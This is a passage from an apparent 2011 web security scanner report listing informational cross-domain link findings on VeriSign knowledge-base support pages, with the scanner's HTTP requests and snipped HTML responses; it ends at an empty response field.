(PKI) Services</a>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps"> Digital IDs for Secure Email</a>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to"> Detect Fraud Online</a>...[SNIP]... <a class="promo-link" href="http://www.verisign.ch/ssl/free-trial/index.html?tid=gnps-promo"> <img height="183" width="170" alt="Try VeriSign SSL or VeriSign Trust Seal - FREE!" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg"> </a>...[SNIP]... <p class="small"> <a href="//verisign.com/partnersupport/worldwide/partnersupport.html" rel="external"> Email support for login help.</a>...[SNIP]... </div> <a class="promo-link" href="//www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo"> <img height="231" width="170" alt="See all Featured SSL Partners" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg"> </a>...[SNIP]... <a class="promo-link" href="/support/ssl-certificates-support/index.html?tid=gnpsupport-promo"> <img height="183" width="170" alt="24/7 help with your SSL Certificates. Try the Knowledge Base." src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg"> </a>...[SNIP]... <li><a href="https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH"> VeriSign Trust Center Sign In</a>...[SNIP]... <li><a href="https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH"> VeriSign Trust Center Sign In</a>...[SNIP]... <li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do"> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]... <li><a href="https://products.verisign.com/geocenter/reseller/logon.do"> VeriSign Partner Center Sign In</a>...[SNIP]... <li><a href="//blogs.verisign.com/?tid=footer"> Blogs</a>...[SNIP]... <li><a href="//www.verisign.com/verisign-worldwide/index.html?tid=footer"> Worldwide Sites</a>...[SNIP]... <li> <a href="//www.verisign.com/rss/index.html?tid=footer"> RSS</a>...[SNIP]... </a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html"> two-factor authentication</a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html"> identity protection</a>...[SNIP]... </a> and <a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps"> public key infrastructure</a> (<a href="//www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html"> PKI</a>...[SNIP]...
14.11. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/ssl-certificates-support/index.html
Issue detail
The page was loaded from a URL containing a query string:https://knowledge.verisign.ch/support/ssl-certificates-support/index.html?tid=gnpsupport The response contains the following links to other domains:https://blogs.verisign.com/?tid=footer https://cc-admin.geotrust.com/geocenter/reseller/logon.do https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg https://products.verisign.com/geocenter/reseller/logon.do https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en https://securitycenter.verisign.com/celp/enroll/outsideSearch?application_locale=VRSN_US&originator=VeriSign:CELP https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH https://ssl-certificate-center.verisign.com/process/retail/console_login https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH https://verisign.com/partnersupport/worldwide/partnersupport.html https://www.verisign.be/ https://www.verisign.ch/?tid=header-logo https://www.verisign.co.jp/ https://www.verisign.co.nz/ https://www.verisign.co.uk/ https://www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html https://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html https://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps https://www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to https://www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html https://www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps https://www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps https://www.verisign.com.au/ https://www.verisign.com.br/ https://www.verisign.com.hk/ https://www.verisign.com.sg/ https://www.verisign.com.tw/ https://www.verisign.com/ https://www.verisign.com/ar/ https://www.verisign.com/ca/ https://www.verisign.com/cl/ https://www.verisign.com/latinamerica/esp/ https://www.verisign.com/mx/ https://www.verisign.com/nl/ https://www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo https://www.verisign.com/rss/index.html?tid=footer https://www.verisign.com/verisign-worldwide/index.html?tid=footer https://www.verisign.de/ https://www.verisign.dk/ https://www.verisign.es/ https://www.verisign.fr/ https://www.verisign.in/ https://www.verisign.it/ https://www.verisign.se/ https://www.verisignchina.com.cn/
Request
GET /support/ssl-certificates-support/index.html?tid=gnpsupport HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:42:32 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <p id="site_logo"> <a title="Now from Symantec - VeriSign Authentication Services" href="//www.verisign.ch/?tid=header-logo"> <img src="/apps/infocenter/sites/verisign/images/symc-auth_logo.png">...[SNIP]... <li><a href="//www.verisign.com/ar/"> Argentina</a>...[SNIP]... <li><a href="//www.verisign.com.au/"> Australia</a>...[SNIP]... <li><a href="//www.verisign.be/"> Belgium</a>...[SNIP]... <li><a href="//www.verisign.com.br/"> Brazil</a>...[SNIP]... <li><a href="//www.verisign.com/ca/"> Canada</a>...[SNIP]... <li><a href="//www.verisign.com/cl/"> Chile</a>...[SNIP]... <li><a href="//www.verisignchina.com.cn/"> China</a>...[SNIP]... <li><a href="//www.verisign.dk/"> Denmark</a>...[SNIP]... <li><a href="//www.verisign.fr/"> France</a>...[SNIP]... <li><a href="//www.verisign.de/"> Germany</a>...[SNIP]... <li><a href="//www.verisign.com.hk/"> Hong Kong</a>...[SNIP]... <li><a href="//www.verisign.in/"> India</a>...[SNIP]... <li><a href="//www.verisign.it/"> Italy</a>...[SNIP]... <li><a href="//www.verisign.co.jp/"> Japan</a>...[SNIP]... <li><a href="//www.verisign.com/latinamerica/esp/"> Latin America</a>...[SNIP]... <li><a href="//www.verisign.com/mx/"> Mexico</a>...[SNIP]... <li><a href="//www.verisign.com/nl/"> Netherlands</a>...[SNIP]... <li><a href="//www.verisign.co.nz/"> New Zealand</a>...[SNIP]... <li><a href="//www.verisign.com.sg/"> Singapore</a>...[SNIP]... <li><a href="//www.verisign.es/"> Spain</a>...[SNIP]... <li><a href="//www.verisign.se/"> Sweden</a>...[SNIP]... <li><a href="//www.verisign.com.tw/"> Taiwan</a>...[SNIP]... <li><a href="//www.verisign.com/"> United States</a>...[SNIP]... <li><a href="//www.verisign.co.uk/"> United Kingdom</a>...[SNIP]... <div id="header_seal"> <script src="https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en" type="text/javascript"> </script>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps"> Two-Factor Authentication</a>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps"> Public Key Infrastructure (PKI) Services</a>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps"> Digital IDs for Secure Email</a>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to"> Detect Fraud Online</a>...[SNIP]... <a class="promo-link" href="http://www.verisign.ch/ssl/free-trial/index.html?tid=gnps-promo"> <img height="183" width="170" alt="Try VeriSign SSL or VeriSign Trust Seal - FREE!" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg"> </a>...[SNIP]... <p class="small"> <a href="//verisign.com/partnersupport/worldwide/partnersupport.html" rel="external"> Email support for login help.</a>...[SNIP]... </div> <a class="promo-link" href="//www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo"> <img height="231" width="170" alt="See all Featured SSL Partners" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg"> </a>...[SNIP]... <a class="promo-link" href="/support/ssl-certificates-support/index.html?tid=gnpsupport-promo"> <img height="183" width="170" alt="24/7 help with your SSL Certificates. Try the Knowledge Base." src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg"> </a>...[SNIP]... <li><a href="https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH"> VeriSign Trust Center Sign In</a>...[SNIP]... <li><a href="https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH"> VeriSign Trust Center Sign In</a>...[SNIP]... <li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do"> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]... <li><a href="https://products.verisign.com/geocenter/reseller/logon.do"> VeriSign Partner Center Sign In</a>...[SNIP]... </a> <a href="https://securitycenter.verisign.com/celp/enroll/outsideSearch?application_locale=VRSN_US&originator=VeriSign:CELP" style="background-image: url(/library/VERISIGN/ALL_OTHER/cran_button_75x24.gif); text-align: center; line-height: 24px; margin: 5px 10px 0pt 0pt; width: 75px; display: block; float: left; height: 24px; color: rgb(255,255,255); font-weight: bold; text-decoration: none"> SEARCH</a>...[SNIP]... <br clear="left" /><a href="https://ssl-certificate-center.verisign.com/process/retail/console_login" style="background-image: url(/library/VERISIGN/ALL_OTHER/cran_button_75x24.gif); text-align: center; line-height: 24px; margin: 5px 10px 0pt 0pt; width: 75px; display: block; float: left; height: 24px; color: rgb(255,255,255); font-weight: bold; text-decoration: none"> SIGN IN</a>...[SNIP]... <li><a href="//blogs.verisign.com/?tid=footer"> Blogs</a>...[SNIP]... <li><a href="//www.verisign.com/verisign-worldwide/index.html?tid=footer"> Worldwide Sites</a>...[SNIP]... <li> <a href="//www.verisign.com/rss/index.html?tid=footer"> RSS</a>...[SNIP]... </a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html"> two-factor authentication</a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html"> identity protection</a>...[SNIP]... </a> and <a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps"> public key infrastructure</a> (<a href="//www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html"> PKI</a>...[SNIP]...
14.12. https://knowledge.verisign.ch/support/trust-seal-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/trust-seal-support/index.html
Issue detail
The page was loaded from a URL containing a query string:https://knowledge.verisign.ch/support/trust-seal-support/index.html?tid=gnpsupport The response contains the following links to other domains:https://blogs.verisign.com/?tid=footer https://cc-admin.geotrust.com/geocenter/reseller/logon.do https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg https://products.verisign.com/geocenter/reseller/logon.do https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH https://trust-center.verisign.ch/process/retail/trust_console_login?application_locale=VTC_US https://verisign.com/partnersupport/worldwide/partnersupport.html https://www.verisign.be/ https://www.verisign.ch/?tid=header-logo https://www.verisign.co.jp/ https://www.verisign.co.nz/ https://www.verisign.co.uk/ https://www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html https://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html https://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps https://www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to https://www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html https://www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps https://www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps https://www.verisign.com.au/ https://www.verisign.com.br/ https://www.verisign.com.hk/ https://www.verisign.com.sg/ https://www.verisign.com.tw/ https://www.verisign.com/ https://www.verisign.com/ar/ https://www.verisign.com/ca/ https://www.verisign.com/cl/ https://www.verisign.com/latinamerica/esp/ https://www.verisign.com/mx/ https://www.verisign.com/nl/ https://www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo https://www.verisign.com/rss/index.html?tid=footer https://www.verisign.com/verisign-worldwide/index.html?tid=footer https://www.verisign.com/vtcsslvideo/index.html https://www.verisign.de/ https://www.verisign.dk/ https://www.verisign.es/ https://www.verisign.fr/ https://www.verisign.in/ https://www.verisign.it/ https://www.verisign.se/ https://www.verisignchina.com.cn/
Request
GET /support/trust-seal-support/index.html?tid=gnpsupport HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:01 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <p id="site_logo"> <a title="Now from Symantec - VeriSign Authentication Services" href="//www.verisign.ch/?tid=header-logo"> <img src="/apps/infocenter/sites/verisign/images/symc-auth_logo.png">...[SNIP]... <li><a href="//www.verisign.com/ar/"> Argentina</a>...[SNIP]... <li><a href="//www.verisign.com.au/"> Australia</a>...[SNIP]... <li><a href="//www.verisign.be/"> Belgium</a>...[SNIP]... <li><a href="//www.verisign.com.br/"> Brazil</a>...[SNIP]... <li><a href="//www.verisign.com/ca/"> Canada</a>...[SNIP]... <li><a href="//www.verisign.com/cl/"> Chile</a>...[SNIP]... <li><a href="//www.verisignchina.com.cn/"> China</a>...[SNIP]... <li><a href="//www.verisign.dk/"> Denmark</a>...[SNIP]... <li><a href="//www.verisign.fr/"> France</a>...[SNIP]... <li><a href="//www.verisign.de/"> Germany</a>...[SNIP]... <li><a href="//www.verisign.com.hk/"> Hong Kong</a>...[SNIP]... <li><a href="//www.verisign.in/"> India</a>...[SNIP]... <li><a href="//www.verisign.it/"> Italy</a>...[SNIP]... <li><a href="//www.verisign.co.jp/"> Japan</a>...[SNIP]... <li><a href="//www.verisign.com/latinamerica/esp/"> Latin America</a>...[SNIP]... <li><a href="//www.verisign.com/mx/"> Mexico</a>...[SNIP]... <li><a href="//www.verisign.com/nl/"> Netherlands</a>...[SNIP]... <li><a href="//www.verisign.co.nz/"> New Zealand</a>...[SNIP]... <li><a href="//www.verisign.com.sg/"> Singapore</a>...[SNIP]... <li><a href="//www.verisign.es/"> Spain</a>...[SNIP]... <li><a href="//www.verisign.se/"> Sweden</a>...[SNIP]... <li><a href="//www.verisign.com.tw/"> Taiwan</a>...[SNIP]... <li><a href="//www.verisign.com/"> United States</a>...[SNIP]... <li><a href="//www.verisign.co.uk/"> United Kingdom</a>...[SNIP]... <div id="header_seal"> <script src="https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en" type="text/javascript"> </script>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps"> Two-Factor Authentication</a>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps"> Public Key Infrastructure (PKI) Services</a>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps"> Digital IDs for Secure Email</a>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to"> Detect Fraud Online</a>...[SNIP]... <a class="promo-link" href="http://www.verisign.ch/ssl/free-trial/index.html?tid=gnps-promo"> <img height="183" width="170" alt="Try VeriSign SSL or VeriSign Trust Seal - FREE!" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg"> </a>...[SNIP]... <p class="small"> <a href="//verisign.com/partnersupport/worldwide/partnersupport.html" rel="external"> Email support for login help.</a>...[SNIP]... </div> <a class="promo-link" href="//www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo"> <img height="231" width="170" alt="See all Featured SSL Partners" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg"> </a>...[SNIP]... <a class="promo-link" href="/support/ssl-certificates-support/index.html?tid=gnpsupport-promo"> <img height="183" width="170" alt="24/7 help with your SSL Certificates. Try the Knowledge Base." src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg"> </a>...[SNIP]... <li><a href="https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH"> VeriSign Trust Center Sign In</a>...[SNIP]... <li><a href="https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH"> VeriSign Trust Center Sign In</a>...[SNIP]... <li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do"> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]... <li><a href="https://products.verisign.com/geocenter/reseller/logon.do"> VeriSign Partner Center Sign In</a>...[SNIP]... <br style="clear: left" /> <a style="background-image: url(/library/VERISIGN/ALL_OTHER/cran_button_75x24.gif); text-align: center; line-height: 24px; margin: 5px 10px 0pt 0pt; width: 75px; display: block; float: left; height: 24px; color: rgb(255,255,255); font-weight: bold; text-decoration: none" href="https://trust-center.verisign.ch/process/retail/trust_console_login?application_locale=VTC_US"> Sign In</a>...[SNIP]... <li> <a href="https://www.verisign.com/vtcsslvideo/index.html" target="_blank"> Trust Center Enrollment Demo (video) </a>...[SNIP]... <li><a href="//blogs.verisign.com/?tid=footer"> Blogs</a>...[SNIP]... <li><a href="//www.verisign.com/verisign-worldwide/index.html?tid=footer"> Worldwide Sites</a>...[SNIP]... <li> <a href="//www.verisign.com/rss/index.html?tid=footer"> RSS</a>...[SNIP]... </a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html"> two-factor authentication</a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html"> identity protection</a>...[SNIP]... </a> and <a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps"> public key infrastructure</a> (<a href="//www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html"> PKI</a>...[SNIP]...
14.13. https://knowledge.verisign.com/support/code-signing-support/index
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/code-signing-support/index
Issue detail
The page was loaded from a URL containing a query string:https://knowledge.verisign.com/support/code-signing-support/index?page=content&id=AR185 The response contains the following links to other domains:https://cc-admin.geotrust.com/geocenter/reseller/logon.do https://www.verisign.be/ https://www.verisign.ch/ https://www.verisign.de/ https://www.verisign.dk/ https://www.verisign.es/ https://www.verisign.fr/ https://www.verisign.in/ https://www.verisign.it/ https://www.verisign.se/ https://www.verisignchina.com.cn/
Request
GET /support/code-signing-support/index?page=content&id=AR185 HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:36 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio...[SNIP]... <li><a href="//www.verisign.be/"> Belgium</a>...[SNIP]... <li><a href="//www.verisignchina.com.cn/"> China</a>...[SNIP]... <li><a href="//www.verisign.dk/"> Denmark</a>...[SNIP]... <li><a href="//www.verisign.fr/"> France</a>...[SNIP]... <li><a href="//www.verisign.de/"> Germany</a>...[SNIP]... <li><a href="//www.verisign.in/"> India</a>...[SNIP]... <li><a href="//www.verisign.it/"> Italy</a>...[SNIP]... <li><a href="//www.verisign.es/"> Spain</a>...[SNIP]... <li><a href="//www.verisign.se/"> Sweden</a>...[SNIP]... <li><a href="//www.verisign.ch/"> Switzerland</a>...[SNIP]... <li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do"> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]...
14.14. https://knowledge.verisign.com/support/code-signing-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/code-signing-support/index.html
Issue detail
The page was loaded from a URL containing a query string:https://knowledge.verisign.com/support/code-signing-support/index.html?tid=gnpsupport The response contains the following links to other domains:https://cc-admin.geotrust.com/geocenter/reseller/logon.do https://www.verisign.be/ https://www.verisign.ch/ https://www.verisign.de/ https://www.verisign.dk/ https://www.verisign.es/ https://www.verisign.fr/ https://www.verisign.in/ https://www.verisign.it/ https://www.verisign.se/ https://www.verisignchina.com.cn/
Request
GET /support/code-signing-support/index.html?tid=gnpsupport HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:38 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <li><a href="//www.verisign.be/"> Belgium</a>...[SNIP]... <li><a href="//www.verisignchina.com.cn/"> China</a>...[SNIP]... <li><a href="//www.verisign.dk/"> Denmark</a>...[SNIP]... <li><a href="//www.verisign.fr/"> France</a>...[SNIP]... <li><a href="//www.verisign.de/"> Germany</a>...[SNIP]... <li><a href="//www.verisign.in/"> India</a>...[SNIP]... <li><a href="//www.verisign.it/"> Italy</a>...[SNIP]... <li><a href="//www.verisign.es/"> Spain</a>...[SNIP]... <li><a href="//www.verisign.se/"> Sweden</a>...[SNIP]... <li><a href="//www.verisign.ch/"> Switzerland</a>...[SNIP]... <li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do"> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]...
14.15. https://knowledge.verisign.com/support/digital-id-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/digital-id-support/index.html
Issue detail
The page was loaded from a URL containing a query string:https://knowledge.verisign.com/support/digital-id-support/index.html?tid=gnsupport The response contains the following links to other domains:https://cc-admin.geotrust.com/geocenter/reseller/logon.do https://www.verisign.be/ https://www.verisign.ch/ https://www.verisign.de/ https://www.verisign.dk/ https://www.verisign.es/ https://www.verisign.fr/ https://www.verisign.in/ https://www.verisign.it/ https://www.verisign.se/ https://www.verisignchina.com.cn/
Request
GET /support/digital-id-support/index.html?tid=gnsupport HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:40 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <li><a href="//www.verisign.be/"> Belgium</a>...[SNIP]... <li><a href="//www.verisignchina.com.cn/"> China</a>...[SNIP]... <li><a href="//www.verisign.dk/"> Denmark</a>...[SNIP]... <li><a href="//www.verisign.fr/"> France</a>...[SNIP]... <li><a href="//www.verisign.de/"> Germany</a>...[SNIP]... <li><a href="//www.verisign.in/"> India</a>...[SNIP]... <li><a href="//www.verisign.it/"> Italy</a>...[SNIP]... <li><a href="//www.verisign.es/"> Spain</a>...[SNIP]... <li><a href="//www.verisign.se/"> Sweden</a>...[SNIP]... <li><a href="//www.verisign.ch/"> Switzerland</a>...[SNIP]... <li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do"> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]...
14.16. https://knowledge.verisign.com/support/eca-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/eca-support/index.html
Issue detail
The page was loaded from a URL containing a query string:https://knowledge.verisign.com/support/eca-support/index.html?tid=gnsupport The response contains the following links to other domains:https://cc-admin.geotrust.com/geocenter/reseller/logon.do https://www.verisign.be/ https://www.verisign.ch/ https://www.verisign.de/ https://www.verisign.dk/ https://www.verisign.es/ https://www.verisign.fr/ https://www.verisign.in/ https://www.verisign.it/ https://www.verisign.se/ https://www.verisignchina.com.cn/
Request
GET /support/eca-support/index.html?tid=gnsupport HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:41 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <li><a href="//www.verisign.be/"> Belgium</a>...[SNIP]... <li><a href="//www.verisignchina.com.cn/"> China</a>...[SNIP]... <li><a href="//www.verisign.dk/"> Denmark</a>...[SNIP]... <li><a href="//www.verisign.fr/"> France</a>...[SNIP]... <li><a href="//www.verisign.de/"> Germany</a>...[SNIP]... <li><a href="//www.verisign.in/"> India</a>...[SNIP]... <li><a href="//www.verisign.it/"> Italy</a>...[SNIP]... <li><a href="//www.verisign.es/"> Spain</a>...[SNIP]... <li><a href="//www.verisign.se/"> Sweden</a>...[SNIP]... <li><a href="//www.verisign.ch/"> Switzerland</a>...[SNIP]... <li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do"> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]...
14.17. https://knowledge.verisign.com/support/mpki-for-ssl-support/index
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/mpki-for-ssl-support/index
Issue detail
The page was loaded from a URL containing a query string:https://knowledge.verisign.com/support/mpki-for-ssl-support/index?page=home The response contains the following links to other domains:https://cc-admin.geotrust.com/geocenter/reseller/logon.do https://www.verisign.be/ https://www.verisign.ch/ https://www.verisign.de/ https://www.verisign.dk/ https://www.verisign.es/ https://www.verisign.fr/ https://www.verisign.in/ https://www.verisign.it/ https://www.verisign.se/ https://www.verisignchina.com.cn/
Request
GET /support/mpki-for-ssl-support/index?page=home HTTP/1.1 Host: knowledge.verisign.com Connection: keep-alive Referer: https://knowledge.verisign.com/support/mpki-for-ssl-support/index?page=content&id=AR1295&pmv=print&actp=PRINT&viewlocale=fr_FR User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; JSESSIONID=0BA75884D1245C296CF5414E376DC3FC; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
